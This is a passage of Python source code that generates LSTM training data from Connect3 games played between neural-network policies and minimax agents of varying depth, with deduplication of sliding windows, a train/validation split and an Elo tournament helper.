    for w1_indx,w1 in enumerate(weights):
        model1.base_model.set_weights(weights[w1])
        if logger:
            logger.info("STARTING WITH WEIGHTS: " + w1)
        # before updating the label, we check if we have a new one, in that case
        # we reset both
        new_label = int(w1.split("_")[0][-1])
        if new_label != label:
            if label != 0:
                # stash the finished label's accumulators before resetting
                total_games_list[label] = games_list
                total_sequence_list[label] = sequence_list
            games_list = []
            sequence_list = []
        label = int(w1.split("_")[0][-1])
        for w2_indx,w2 in enumerate(weights):
            print("Starting weights " + str(w1) + " vs weights " + str(w2))
            model2.base_model.set_weights(weights[w2])
            for i in range(number_of_games):
                # per-game accumulators
                board_plus_action_total = []
                timestep = 0
                game_over = False
                actions = {}
                encoded_game = []
                if randomize:
                    starting_player = random.choice([player1_ID, player2_ID])
                    if starting_player == player1_ID:
                        encoded_game.append("p1_")
                    elif starting_player == player2_ID:
                        encoded_game.append("p2_")
                else:
                    starting_player = player1_ID
                    encoded_game.append("p1_")
                game.reset(starting_player=starting_player,randomize=False)
                while not game_over:
                    timestep += 1
                    actual_player = game.current_player
                    board = game.board
                    board_p2 = game.board_p2
                    if actual_player == player1_ID:
                        input_dict = {"obs": {}}
                        action_mask = game.get_moves(True)
                        input_dict["obs"]["state"] = board
                        input_dict["obs"]["action_mask"] = action_mask
                        action_logits, _ = model1.forward(input_dict, None, None)
                        if timestep > number_of_stochastic_moves:
                            # deterministic play: greedy argmax over the logits
                            act = np.argmax(action_logits[0])
                        elif timestep <= number_of_stochastic_moves:
                            # exploration: sample an action from the softmax
                            action_prob = [np.exp(single_log)/sum(np.exp(action_logits[0])) for single_log in action_logits[0]]
                            act = np.random.choice([0,1,2,3,4],1,p=action_prob)[0]
                        encoded_game.append(str(act))
                        # only model1 (player 1) steps become training data
                        flattened_board = np.ndarray.flatten(board)
                        board_plus_actions = np.append(flattened_board,float(act))
                        board_plus_action_total.append([board_plus_actions])
                        actions[player1] = act
                        _, rew, done, _ = game.step(actions)
                    elif actual_player == player2_ID:
                        input_dict = {"obs": {}}
                        action_mask = game.get_moves(True)
                        input_dict["obs"]["state"] = board_p2 #reshaped_board
                        input_dict["obs"]["action_mask"] = action_mask
                        action_logits, _ = model2.forward(input_dict, None, None)
                        if timestep > number_of_stochastic_moves:
                            act = np.argmax(action_logits[0])
                        elif timestep <= number_of_stochastic_moves:
                            action_prob = [np.exp(single_log)/sum(np.exp(action_logits[0])) for single_log in action_logits[0]]
                            act = np.random.choice([0,1,2,3,4],1,p=action_prob)[0]
                        encoded_game.append(str(act))
                        actions[player2] = act
                        _, rew, done, _ = game.step(actions)
                    else:
                        raise ValueError("Player index is not valid, should be 0 or 1")
                    if done["__all__"]:
                        # we use 7,8,9 as value for the outcome in order to
                        # not confuse them with the values of actions
                        if rew["player1"] == 1:
                            encoded_game.append("_7")
                            outcome = 7.0
                        elif rew["player1"] == -1:
                            encoded_game.append("_8")
                            outcome = 8.0
                        elif rew["player1"] == 0:
                            encoded_game.append("_9")
                            outcome = 9.0
                        game_over = True
                        game_str = ''.join(encoded_game)
                        # add the encoded game to the list
                        if game_str in games_list:
                            number_of_equal_games += 1
                        elif game_str not in games_list:
                            games_list.append(game_str)
                        # if the game is too short, just discard it
                        if len(board_plus_action_total) < sequence_len:
                            continue
                        # append the final outcome to every recorded step
                        board_plus_action_and_outcome = []
                        for elem in board_plus_action_total:
                            new_elem = np.append(elem,outcome)
                            board_plus_action_and_outcome.append([new_elem])
                        # slide a window of sequence_len over the steps
                        for j in range(len(board_plus_action_and_outcome)-(sequence_len-1)):
                            to_string=str(board_plus_action_and_outcome[j:j+sequence_len])
                            if to_string in sequence_list:
                                number_of_equal_sequences += 1
                            else:
                                sequence_list.append(to_string)
                                dataset_no_clones.append([])
                                dataset_no_clones[-1].append(board_plus_action_and_outcome[j:j+sequence_len])
                                dataset_no_clones[-1].append(label)
                            # 'dataset' keeps every window, duplicates included
                            dataset.append([])
                            dataset[-1].append(board_plus_action_and_outcome[j:j+sequence_len])
                            dataset[-1].append(label)
    # stash the accumulators of the last label processed
    total_games_list[label] = games_list
    total_sequence_list[label] = sequence_list
    print("The number of equal games is: " + str(number_of_equal_games))
    print("The number of equal sequences is: " + str(number_of_equal_sequences))
    return total_sequence_list, total_games_list, dataset,dataset_no_clones
def model_vs_model_connect3_generate_data_v4(model1,model2,use_outcome,weights, number_of_games,sequence_len,randomize=True,number_of_stochastic_moves=0,logger=None):
    """
    In this version we also add the outcome of the game to the vector

    Like v3, but the outcome (7.0 win / 8.0 loss / 9.0 draw, from
    player1's side) is appended only when ``use_outcome`` is True, and
    duplicates are removed a-posteriori: any window that is ever seen a
    second time is dropped from the returned ``final_dataset`` and
    ``final_sequences``.

    :returns:
        (sequence_list, games_list, dataset, final_dataset, final_sequences)
        where ``final_sequences`` maps label -> surviving window strings.
    """
    game = Connect4Env(None,width=Connect3Config.WIDTH,
                       height=Connect3Config.HEIGHT,
                       n_actions=Connect3Config.N_ACTIONS,
                       connect=Connect3Config.CONNECT,
                       )
    dataset_no_clones = []
    dataset = []
    # game encoded as a string
    games_list = []
    number_of_equal_games = 0
    # sequence of configuration encoded as a string
    sequence_list = []
    number_of_equal_sequences = 0
    # index of data that are equals and we need to remove from dataset later
    indx_to_remove = []
    label = 0
    # unique window strings grouped by label
    sequences_per_player = {}
    # Tournament between agents with different weights
    for w1_indx,w1 in enumerate(weights):
        model1.base_model.set_weights(weights[w1])
        if logger:
            logger.info("STARTING WITH WEIGHTS: " + w1)
        # class label = trailing digit of the first "_"-token of the name
        label = int(w1.split("_")[0][-1])
        if label not in sequences_per_player:
            sequences_per_player[label] = []
        for w2_indx,w2 in enumerate(weights):
            print("Starting weights " + str(w1) + " vs weights " + str(w2))
            model2.base_model.set_weights(weights[w2])
            for i in range(number_of_games):
                # per-game accumulators
                board_plus_action_total = []
                timestep = 0
                game_over = False
                actions = {}
                encoded_game = []
                if randomize:
                    starting_player = random.choice([player1_ID, player2_ID])
                    if starting_player == player1_ID:
                        encoded_game.append("p1_")
                    elif starting_player == player2_ID:
                        encoded_game.append("p2_")
                else:
                    starting_player = player1_ID
                    encoded_game.append("p1_")
                game.reset(starting_player=starting_player,randomize=False)
                while not game_over:
                    timestep += 1
                    actual_player = game.current_player
                    board = game.board
                    board_p2 = game.board_p2
                    if actual_player == player1_ID:
                        input_dict = {"obs": {}}
                        action_mask = game.get_moves(True)
                        input_dict["obs"]["state"] = board
                        input_dict["obs"]["action_mask"] = action_mask
                        action_logits, _ = model1.forward(input_dict, None, None)
                        if timestep > number_of_stochastic_moves:
                            # deterministic play: greedy argmax over the logits
                            act = np.argmax(action_logits[0])
                        elif timestep <= number_of_stochastic_moves:
                            # exploration: sample an action from the softmax
                            action_prob = [np.exp(single_log)/sum(np.exp(action_logits[0])) for single_log in action_logits[0]]
                            act = np.random.choice([0,1,2,3,4],1,p=action_prob)[0]
                        encoded_game.append(str(act))
                        # only model1 (player 1) steps become training data
                        flattened_board = np.ndarray.flatten(board)
                        board_plus_actions = np.append(flattened_board,float(act))
                        board_plus_action_total.append([board_plus_actions])
                        actions[player1] = act
                        _, rew, done, _ = game.step(actions)
                    elif actual_player == player2_ID:
                        input_dict = {"obs": {}}
                        action_mask = game.get_moves(True)
                        input_dict["obs"]["state"] = board_p2 #reshaped_board
                        input_dict["obs"]["action_mask"] = action_mask
                        action_logits, _ = model2.forward(input_dict, None, None)
                        if timestep > number_of_stochastic_moves:
                            act = np.argmax(action_logits[0])
                        elif timestep <= number_of_stochastic_moves:
                            action_prob = [np.exp(single_log)/sum(np.exp(action_logits[0])) for single_log in action_logits[0]]
                            act = np.random.choice([0,1,2,3,4],1,p=action_prob)[0]
                        encoded_game.append(str(act))
                        actions[player2] = act
                        _, rew, done, _ = game.step(actions)
                    else:
                        raise ValueError("Player index is not valid, should be 0 or 1")
                    if done["__all__"]:
                        # we use 7,8,9 as value for the outcome in order to
                        # not confuse them with the values of actions
                        if use_outcome:
                            if rew["player1"] == 1:
                                encoded_game.append("_7")
                                outcome = 7.0
                            elif rew["player1"] == -1:
                                encoded_game.append("_8")
                                outcome = 8.0
                            elif rew["player1"] == 0:
                                encoded_game.append("_9")
                                outcome = 9.0
                        game_over = True
                        game_str = ''.join(encoded_game)
                        # add the encoded game to the list
                        if game_str in games_list:
                            number_of_equal_games += 1
                        elif game_str not in games_list:
                            games_list.append(game_str)
                        # if the game is too short, just discard it
                        if len(board_plus_action_total) < sequence_len:
                            continue
                        if use_outcome:
                            # append the final outcome to every recorded step
                            board_plus_action_and_outcome = []
                            for elem in board_plus_action_total:
                                new_elem = np.append(elem,outcome)
                                board_plus_action_and_outcome.append([new_elem])
                        else:
                            board_plus_action_and_outcome = board_plus_action_total
                        # slide a window of sequence_len over the steps
                        for j in range(len(board_plus_action_and_outcome)-(sequence_len-1)):
                            to_string=str(board_plus_action_and_outcome[j:j+sequence_len])
                            if to_string in sequence_list:
                                # duplicate: remember the first occurrence's
                                # index so it can be dropped at the end
                                indx = sequence_list.index(to_string)
                                number_of_equal_sequences += 1
                                if indx not in indx_to_remove:
                                    indx_to_remove.append(indx)
                            else:
                                sequences_per_player[label].append(to_string)
                                sequence_list.append(to_string)
                                dataset_no_clones.append([])
                                dataset_no_clones[-1].append(board_plus_action_and_outcome[j:j+sequence_len])
                                dataset_no_clones[-1].append(label)
                            # 'dataset' keeps every window, duplicates included
                            dataset.append([])
                            dataset[-1].append(board_plus_action_and_outcome[j:j+sequence_len])
                            dataset[-1].append(label)
    # keep only the windows that were never seen twice
    final_dataset = []
    for i,elem in enumerate(dataset_no_clones):
        if i not in indx_to_remove:
            final_dataset.append(elem)
    count = 0
    final_sequences = {}
    # NOTE(review): relies on dict insertion order walking the sequences in
    # the same global order as sequence_list — confirm
    for elem in sequences_per_player:
        final_sequences[elem] = []
        for indx,elem_2 in enumerate(sequences_per_player[elem]):
            if count not in indx_to_remove:
                final_sequences[elem].append(elem_2)
            count += 1
    print("Original dataset length " + str(len(dataset_no_clones)) + " without clones: " + str(len(final_dataset)))
    print("The number of equal games is: " + str(number_of_equal_games))
    print("The number of equal sequences is: " + str(number_of_equal_sequences))
    return sequence_list, games_list, dataset,final_dataset,final_sequences
def split_train_val(loaded_data,depth_list,val_indx=0.15,shuffle = True):
    """
    Split a labelled dataset into train and validation sets with one-hot labels.

    val_indx is the percentage of elements in the validation set
    :params:
        loaded_data: list
            list of lists, where the first element are the encoded games
            and the second is the label
        depth_list: list
            every possible label value; the position of a label inside this
            list decides which slot of its one-hot vector is set
        val_indx: float
            fraction of elements placed in the validation set
        shuffle: bool
            if True, shuffle (via numpy, in place on a copy) before splitting
    :returns:
        x_train, y_train, x_val, y_val — inputs and one-hot label lists
    :raises:
        ValueError if a label is not present in depth_list
    """
    # work on a shallow copy so the caller's list is never reordered
    shuffled_dataset = [ [elem[0],elem[1]] for elem in loaded_data]
    val_elems = int(len(shuffled_dataset)*val_indx)
    train_elems = len(shuffled_dataset) - val_elems
    # shuffle the dataset
    if shuffle:
        np.random.shuffle(shuffled_dataset)
    x_train = []
    y_train = []
    x_val = []
    y_val = []
    for i,elem in enumerate(shuffled_dataset):
        # fresh one-hot vector for every sample
        one_hot_vec = [0] * len(depth_list)
        indx = depth_list.index(elem[1])
        one_hot_vec[indx] = 1
        # first train_elems samples go to train, the rest to validation
        if i < train_elems:
            x_train.append(elem[0])
            y_train.append(one_hot_vec)
        else:
            x_val.append(elem[0])
            y_val.append(one_hot_vec)
    return x_train,y_train,x_val,y_val
def minimax_vs_minimax_connect3_generate_data(depth_list,number_of_games,sequence_len,randomize= True,logger = None):
    """
    simulates 'number_of_games' between all combinations of minimax depth
    inside the depth list.
    :params:
        depth_list: list of int
            minimax depths
        number_of_games: int
            games played for every (depth1, depth2) pairing
        sequence_len: int
            length of the sliding windows cut out of each game; shorter
            games are discarded
        randomize: bool
            randomize which player starts
        logger: optional logger for per-move tracing
    :returns:
        (games_list, sequence_list, dataset, dataset_no_clones,
         final_dataset, dataset_full_games, final_sequences);
        windows ever seen twice are dropped from final_dataset /
        final_sequences.
    """
    game = Connect4Env(None,width=Connect3Config.WIDTH,
                       height=Connect3Config.HEIGHT,
                       n_actions=Connect3Config.N_ACTIONS,
                       connect=Connect3Config.CONNECT,
                       )
    dataset_no_clones = []
    dataset = []
    dataset_full_games = []
    # game encoded as a string
    games_list = []
    number_of_equal_games = 0
    # sequence of configuration encoded as a string
    sequence_list = []
    number_of_equal_sequences = 0
    # index of data that are equals and we need to remove from dataset later
    indx_to_remove = []
    # we record here all the different unique sequences done by every single player
    sequences_per_player = {}
    for depth1 in depth_list:
        # the label is the search depth of the recorded (player 1) agent
        label = int(depth1)
        if label not in sequences_per_player:
            sequences_per_player[label] = []
        for depth2 in depth_list:
            print("Starting minimax depth " + str(depth1) + " vs minimax " + str(depth2))
            if logger:
                logger.info(
                    "**********MINIMAX_depth_"
                    + str(depth1)
                    + "_(X) VS (O)_MINIMAX_depth_"
                    + str(depth2)
                    + "**********"
                )
            for i in range(number_of_games):
                # per-game accumulators
                board_plus_action_total = []
                game_over = False
                actions = {}
                encoded_game = []
                if randomize:
                    starting_player = random.choice([player1_ID, player2_ID])
                    if starting_player == player1_ID:
                        encoded_game.append("p1_")
                    elif starting_player == player2_ID:
                        encoded_game.append("p2_")
                else:
                    starting_player = player1_ID
                    encoded_game.append("p1_")
                game.reset(starting_player=starting_player,randomize=False)
                while not game_over:
                    actual_player = game.current_player
                    board = game.board
                    board_p2 = game.board_p2
                    if actual_player == player1_ID:
                        act, _ = minimax_connect3(board, player1_ID, True, depth=depth1)
                        actions[player1] = act
                        encoded_game.append(str(act))
                        # only player 1 (the labelled agent) steps are recorded
                        flattened_board = np.ndarray.flatten(board)
                        board_plus_actions = np.append(flattened_board,float(act))
                        board_plus_action_total.append([board_plus_actions])
                        _, _, done, _ = game.step(actions)
                    elif actual_player == player2_ID:
                        act, _ = minimax_connect3(board, player2_ID, True, depth=depth2)
                        actions[player2] = act
                        _, _, done, _ = game.step(actions)
                    else:
                        raise ValueError("Player index is not valid, should be 0 or 1")
                    if logger:
                        logger.info("Game number " + str(i) + "/" + str(number_of_games))
                        logger.info(
                            "Player " + str(actual_player + 1) + " actions: " + str(act)
                        )
                        logger.info("\n" + repr(board))
                        logger.info(board_print(board,Connect3Config.HEIGHT,Connect3Config.WIDTH))
                    if done["__all__"]:
                        if logger:
                            logger.info("PLAYER " + str(game.winner + 1) + " WON...")
                            logger.info(
                                "CURRENT SCORE: "
                                + str(game.score[player1])
                                + " VS "
                                + str(game.score[player2])
                            )
                        game_over = True
                        game_str = ''.join(encoded_game)
                        # add the encoded game to the list
                        if game_str in games_list:
                            number_of_equal_games += 1
                        elif game_str not in games_list:
                            games_list.append(game_str)
                        # if the game is too short, just discard it
                        if len(board_plus_action_total) < sequence_len:
                            continue
                        # also keep the whole (unsliced) game with its label
                        dataset_full_games.append([])
                        dataset_full_games[-1].append(board_plus_action_total)
                        dataset_full_games[-1].append(label)
                        # slide a window of sequence_len over the steps
                        for j in range(len(board_plus_action_total)-(sequence_len-1)):
                            to_string=str(board_plus_action_total[j:j+sequence_len])
                            if to_string in sequence_list:
                                # duplicate: remember the first occurrence's
                                # index so it can be dropped at the end
                                indx = sequence_list.index(to_string)
                                number_of_equal_sequences += 1
                                if indx not in indx_to_remove:
                                    indx_to_remove.append(indx)
                            else:
                                sequences_per_player[label].append(to_string)
                                sequence_list.append(to_string)
                                dataset_no_clones.append([])
                                dataset_no_clones[-1].append(board_plus_action_total[j:j+sequence_len])
                                dataset_no_clones[-1].append(label)
                            # 'dataset' keeps every window, duplicates included
                            dataset.append([])
                            dataset[-1].append(board_plus_action_total[j:j+sequence_len])
                            dataset[-1].append(label)
    # keep only the windows that were never seen twice
    final_dataset = []
    for i,elem in enumerate(dataset_no_clones):
        if i not in indx_to_remove:
            final_dataset.append(elem)
    count = 0
    final_sequences = {}
    # NOTE(review): relies on dict insertion order walking the sequences in
    # the same global order as sequence_list — confirm
    for elem in sequences_per_player:
        final_sequences[elem] = []
        for indx,elem_2 in enumerate(sequences_per_player[elem]):
            if count not in indx_to_remove:
                final_sequences[elem].append(elem_2)
            count += 1
    print("Original dataset length " + str(len(dataset_no_clones)) + " without clones: " + str(len(final_dataset)))
    print("The number of equal games is: " + str(number_of_equal_games))
    print("The number of equal sequences is: " + str(number_of_equal_sequences))
    return games_list, sequence_list, dataset,dataset_no_clones,final_dataset,dataset_full_games,final_sequences
def minimax_vs_model_connect3_generate_data(depth_list,weights,model,number_of_stochastic_moves,number_of_games,sequence_len,randomize= True,logger = None):
    """
    simulates 'number_of_games' between all combinations of minimax depth
    inside the depth list.
    :params:
        depth_list: list of int
            minimax depths for player 1 (the recorded, labelled agent)
        weights: mapping of weight-name -> weight values for the model
            that plays as player 2
        model: policy exposing ``base_model.set_weights`` and
            ``forward(input_dict, None, None)`` -> (action_logits, _)
        number_of_stochastic_moves: int, the model samples its first N
            plies from the softmax of the logits instead of argmax
        number_of_games: int
            games per (depth, weights) pairing
        sequence_len: int
            sliding-window length; shorter games are discarded
        randomize: bool
            randomize which player starts
        logger: optional logger for per-move tracing
    :returns:
        (games_list, sequence_list, dataset, dataset_no_clones,
         final_dataset, dataset_full_games, final_sequences)
    """
    game = Connect4Env(None,width=Connect3Config.WIDTH,
                       height=Connect3Config.HEIGHT,
                       n_actions=Connect3Config.N_ACTIONS,
                       connect=Connect3Config.CONNECT,
                       )
    dataset_no_clones = []
    dataset = []
    dataset_full_games = []
    # game encoded as a string
    games_list = []
    number_of_equal_games = 0
    # sequence of configuration encoded as a string
    sequence_list = []
    number_of_equal_sequences = 0
    # index of data that are equals and we need to remove from dataset later
    indx_to_remove = []
    # we record here all the different unique sequences done by every single player
    sequences_per_player = {}
    for depth1 in depth_list:
        # the label is the search depth of the recorded (player 1) agent
        label = int(depth1)
        if label not in sequences_per_player:
            sequences_per_player[label] = []
        for w2_indx,w2 in enumerate(weights):
            print("Starting minimax depth_" + str(depth1) + " vs model with weights " + str(w2))
            model.base_model.set_weights(weights[w2])
            for i in range(number_of_games):
                # per-game accumulators
                timestep = 0
                board_plus_action_total = []
                game_over = False
                actions = {}
                encoded_game = []
                if randomize:
                    starting_player = random.choice([player1_ID, player2_ID])
                    if starting_player == player1_ID:
                        encoded_game.append("p1_")
                    elif starting_player == player2_ID:
                        encoded_game.append("p2_")
                else:
                    starting_player = player1_ID
                    encoded_game.append("p1_")
                game.reset(starting_player=starting_player,randomize=False)
                while not game_over:
                    timestep += 1
                    actual_player = game.current_player
                    board = game.board
                    board_p2 = game.board_p2
                    if actual_player == player1_ID:
                        act, _ = minimax_connect3(board, player1_ID, True, depth=depth1)
                        actions[player1] = act
                        encoded_game.append(str(act))
                        # only player 1 (the minimax agent) steps are recorded
                        flattened_board = np.ndarray.flatten(board)
                        board_plus_actions = np.append(flattened_board,float(act))
                        board_plus_action_total.append([board_plus_actions])
                        _, _, done, _ = game.step(actions)
                    elif actual_player == player2_ID:
                        input_dict = {"obs": {}}
                        action_mask = game.get_moves(True)
                        input_dict["obs"]["state"] = board_p2 #reshaped_board
                        input_dict["obs"]["action_mask"] = action_mask
                        action_logits, _ = model.forward(input_dict, None, None)
                        if timestep > number_of_stochastic_moves:
                            # deterministic play: greedy argmax over the logits
                            act = np.argmax(action_logits[0])
                        elif timestep <= number_of_stochastic_moves:
                            # exploration: sample an action from the softmax
                            action_prob = [np.exp(single_log)/sum(np.exp(action_logits[0])) for single_log in action_logits[0]]
                            act = np.random.choice([0,1,2,3,4],1,p=action_prob)[0]
                        encoded_game.append(str(act))
                        actions[player2] = act
                        _, rew, done, _ = game.step(actions)
                    else:
                        raise ValueError("Player index is not valid, should be 0 or 1")
                    if logger:
                        logger.info("Game number " + str(i) + "/" + str(number_of_games))
                        logger.info(
                            "Player " + str(actual_player + 1) + " actions: " + str(act)
                        )
                        logger.info("\n" + repr(board))
                        logger.info(board_print(board,Connect3Config.HEIGHT,Connect3Config.WIDTH))
                    if done["__all__"]:
                        if logger:
                            logger.info("PLAYER " + str(game.winner + 1) + " WON...")
                            logger.info(
                                "CURRENT SCORE: "
                                + str(game.score[player1])
                                + " VS "
                                + str(game.score[player2])
                            )
                        game_over = True
                        game_str = ''.join(encoded_game)
                        # add the encoded game to the list
                        if game_str in games_list:
                            number_of_equal_games += 1
                        elif game_str not in games_list:
                            games_list.append(game_str)
                        # if the game is too short, just discard it
                        if len(board_plus_action_total) < sequence_len:
                            continue
                        # also keep the whole (unsliced) game with its label
                        dataset_full_games.append([])
                        dataset_full_games[-1].append(board_plus_action_total)
                        dataset_full_games[-1].append(label)
                        # slide a window of sequence_len over the steps
                        for j in range(len(board_plus_action_total)-(sequence_len-1)):
                            to_string=str(board_plus_action_total[j:j+sequence_len])
                            if to_string in sequence_list:
                                # duplicate: remember the first occurrence's
                                # index so it can be dropped at the end
                                indx = sequence_list.index(to_string)
                                number_of_equal_sequences += 1
                                if indx not in indx_to_remove:
                                    indx_to_remove.append(indx)
                            else:
                                sequences_per_player[label].append(to_string)
                                sequence_list.append(to_string)
                                dataset_no_clones.append([])
                                dataset_no_clones[-1].append(board_plus_action_total[j:j+sequence_len])
                                dataset_no_clones[-1].append(label)
                            # 'dataset' keeps every window, duplicates included
                            dataset.append([])
                            dataset[-1].append(board_plus_action_total[j:j+sequence_len])
                            dataset[-1].append(label)
    # keep only the windows that were never seen twice
    final_dataset = []
    for i,elem in enumerate(dataset_no_clones):
        if i not in indx_to_remove:
            final_dataset.append(elem)
    count = 0
    final_sequences = {}
    # NOTE(review): relies on dict insertion order walking the sequences in
    # the same global order as sequence_list — confirm
    for elem in sequences_per_player:
        final_sequences[elem] = []
        for indx,elem_2 in enumerate(sequences_per_player[elem]):
            if count not in indx_to_remove:
                final_sequences[elem].append(elem_2)
            count += 1
    print("Original dataset length " + str(len(dataset_no_clones)) + " without clones: " + str(len(final_dataset)))
    print("The number of equal games is: " + str(number_of_equal_games))
    print("The number of equal sequences is: " + str(number_of_equal_sequences))
    return games_list, sequence_list, dataset,dataset_no_clones,final_dataset,dataset_full_games,final_sequences
def minimax_vs_minimax_connect3_single_game(depth1,depth2,sequence_len,discarded_moves=2,randomize= True,logger = None):
    """
    return observation plus actions data of a single game that are
    with shape readable by the lstm

    Plays one minimax (depth1, player 1) vs minimax (depth2, player 2)
    game and returns the player-1 (board + action) steps sliced into
    windows of ``sequence_len``, skipping the first ``discarded_moves``
    windows.  Returns None when the game is shorter than ``sequence_len``
    or when no window survives the discard.
    """
    game = Connect4Env(None,width=Connect3Config.WIDTH,
                       height=Connect3Config.HEIGHT,
                       n_actions=Connect3Config.N_ACTIONS,
                       connect=Connect3Config.CONNECT,
                       )
    board_plus_action_total = []
    game_over = False
    actions = {}
    single_game = []
    if randomize:
        starting_player = random.choice([player1_ID, player2_ID])
    else:
        starting_player = player1_ID
    game.reset(starting_player=starting_player,randomize=False)
    while not game_over:
        actual_player = game.current_player
        board = game.board
        board_p2 = game.board_p2
        if actual_player == player1_ID:
            act, _ = minimax_connect3(board, player1_ID, True, depth=depth1)
            actions[player1] = act
            # only player 1 steps are recorded
            flattened_board = np.ndarray.flatten(board)
            board_plus_actions = np.append(flattened_board,float(act))
            board_plus_action_total.append([board_plus_actions])
            _, _, done, _ = game.step(actions)
        elif actual_player == player2_ID:
            act, _ = minimax_connect3(board, player2_ID, True, depth=depth2)
            actions[player2] = act
            _, _, done, _ = game.step(actions)
        else:
            raise ValueError("Player index is not valid, should be 0 or 1")
        if logger:
            logger.info(
                "Player " + str(actual_player + 1) + " actions: " + str(act)
            )
            logger.info("\n" + repr(board))
            logger.info(board_print(board,Connect3Config.HEIGHT,Connect3Config.WIDTH))
        if done["__all__"]:
            if logger:
                logger.info("PLAYER " + str(game.winner + 1) + " WON...")
                logger.info(
                    "CURRENT SCORE: "
                    + str(game.score[player1])
                    + " VS "
                    + str(game.score[player2])
                )
            game_over = True
    # if the game is too short, just discard it
    if len(board_plus_action_total) < sequence_len:
        return None
    single_game.append([])
    for j in range(len(board_plus_action_total)-(sequence_len-1)):
        # skip the earliest windows: opening moves look alike across depths
        if j >= discarded_moves:
            single_game[-1].append(board_plus_action_total[j:j+sequence_len])
    if len(single_game[-1]) == 0:
        return None
    return single_game
def minimax_vs_minimax_connect3_single_game_plus_outcome(depth1,depth2,sequence_len,discarded_moves=2,randomize= True,logger = None):
    """
    return observation plus actions data of a single game that are
    with shape readable by the lstm.
    It also discard some of the initial moves since they could be the
    same for different level of playing

    Like minimax_vs_minimax_connect3_single_game, but every recorded step
    additionally carries the final outcome seen from player1
    (7.0 win / 8.0 loss / 9.0 draw).  Returns None when the game is
    shorter than ``sequence_len`` or no window survives the discard.
    """
    game = Connect4Env(None,width=Connect3Config.WIDTH,
                       height=Connect3Config.HEIGHT,
                       n_actions=Connect3Config.N_ACTIONS,
                       connect=Connect3Config.CONNECT,
                       )
    board_plus_action_total = []
    game_over = False
    actions = {}
    single_game = []
    if randomize:
        starting_player = random.choice([player1_ID, player2_ID])
    else:
        starting_player = player1_ID
    game.reset(starting_player=starting_player,randomize=False)
    while not game_over:
        actual_player = game.current_player
        board = game.board
        board_p2 = game.board_p2
        if actual_player == player1_ID:
            act, _ = minimax_connect3(board, player1_ID, True, depth=depth1)
            actions[player1] = act
            # only player 1 steps are recorded
            flattened_board = np.ndarray.flatten(board)
            board_plus_actions = np.append(flattened_board,float(act))
            board_plus_action_total.append([board_plus_actions])
            _, rew, done, _ = game.step(actions)
        elif actual_player == player2_ID:
            act, _ = minimax_connect3(board, player2_ID, True, depth=depth2)
            actions[player2] = act
            _, rew, done, _ = game.step(actions)
        else:
            raise ValueError("Player index is not valid, should be 0 or 1")
        if logger:
            logger.info(
                "Player " + str(actual_player + 1) + " actions: " + str(act)
            )
            logger.info("\n" + repr(board))
            logger.info(board_print(board,Connect3Config.HEIGHT,Connect3Config.WIDTH))
        if done["__all__"]:
            if logger:
                logger.info("PLAYER " + str(game.winner + 1) + " WON...")
                logger.info(
                    "CURRENT SCORE: "
                    + str(game.score[player1])
                    + " VS "
                    + str(game.score[player2])
                )
            game_over = True
            # 7/8/9 encode win/loss/draw so they cannot be confused with
            # action values; NOTE(review): 'outcome' stays unbound if the
            # reward is ever outside {-1, 0, 1} — confirm the env contract
            if rew["player1"] == 1:
                outcome = 7.0
            elif rew["player1"] == -1:
                outcome = 8.0
            elif rew["player1"] == 0:
                outcome = 9.0
    # if the game is too short, just discard it
    if len(board_plus_action_total) < sequence_len:
        return None
    # append the final outcome to every recorded step
    board_plus_action_and_outcome = []
    for elem in board_plus_action_total:
        new_elem = np.append(elem,outcome)
        board_plus_action_and_outcome.append([new_elem])
    single_game.append([])
    for j in range(len(board_plus_action_and_outcome)-(sequence_len-1)):
        # skip the earliest windows: opening moves look alike across depths
        if j >= discarded_moves:
            single_game[-1].append(board_plus_action_and_outcome[j:j+sequence_len])
    if len(single_game[-1]) == 0:
        return None
    return single_game
def minimax_tournament(depth_list,number_of_games,randomize=True):
    """
    Round-robin tournament between minimax agents of different depths.

    For every pair with depth1 > depth2, plays ``number_of_games`` games
    (depth1 as player 1) and records player 1's win rate and the Elo
    difference implied by the score.

    :params:
        depth_list: list of int, minimax depths to pit against each other
        number_of_games: int, games per pairing
        randomize: bool, forwarded to ``game.reset``
    :returns:
        (score_total, elo_diff_total): dicts keyed by
        "depth<d1>_vs_depth<d2>" holding win rate and Elo difference.
    """
    game = Connect4Env(None,width=Connect3Config.WIDTH,
                       height=Connect3Config.HEIGHT,
                       n_actions=Connect3Config.N_ACTIONS,
                       connect=Connect3Config.CONNECT,
                       )
    score_total = {}
    elo_diff_total = {}
    for depth2 in depth_list:
        for depth1 in depth_list:
            # only play ordered pairs with depth1 > depth2
            if depth2 >= depth1:
                continue
            print("Starting minimax depth " + str(depth1) + " vs minimax " + str(depth2))
            game.reset_score()
            for i in range(number_of_games):
                game_over = False
                actions = {}
                game.reset(randomize=randomize)
                while not game_over:
                    actual_player = game.current_player
                    board = game.board
                    if actual_player == player1_ID:
                        act, _ = minimax_connect3(board, player1_ID, True, depth=depth1)
                        actions[player1] = act
                        _, _, done, _ = game.step(actions)
                    elif actual_player == player2_ID:
                        act, _ = minimax_connect3(board, player2_ID, True, depth=depth2)
                        actions[player2] = act
                        _, _, done, _ = game.step(actions)
                    else:
                        raise ValueError("Player index is not valid, should be 0 or 1")
                    if done["__all__"]:
                        game_over = True
            # expected score of player 1: wins plus half a point per draw
            score = game.score[player1] / number_of_games + game.num_draws / (
                2 * number_of_games
            )
            # invert the Elo expected-score formula E = 1/(1+10^(-d/400));
            # clamp to +/-400 outside the [1/11, 10/11] score range
            if score >= 10 / 11:
                elo_diff = 400
            elif score == 0 or score <= 1 / 11:
                elo_diff = -400
            else:
                elo_diff = -400 * math.log((1 / score - 1), 10)
            print("minimax depth " + str(depth1) + " vs minimax " + str(depth2) + " elo difference: " + str(elo_diff))
            win_rate = game.score[player1]/number_of_games
            print("minimax depth " + str(depth1) + " win rate: " + str(win_rate))
            score_total["depth" + str(depth1)+"_vs_depth" + str(depth2)] = win_rate
            elo_diff_total["depth" + str(depth1)+"_vs_depth" + str(depth2)] = elo_diff
    return score_total,elo_diff_total
def return_one_hot(depth_list,depth_indx):
    """Return a one-hot list marking where ``depth_indx`` sits in ``depth_list``.

    Raises ValueError (from ``list.index``) if the value is absent.
    """
    hot_position = depth_list.index(depth_indx)
    return [1 if k == hot_position else 0 for k in range(len(depth_list))]
def count_elem_in_dataset(dataset,classes):
    """Count how many dataset entries carry each label listed in ``classes``.

    Entries are [data, label] pairs; labels not in ``classes`` are ignored.
    Returns a dict mapping each class to its occurrence count.
    """
    counts = {c: 0 for c in classes}
    for entry in dataset:
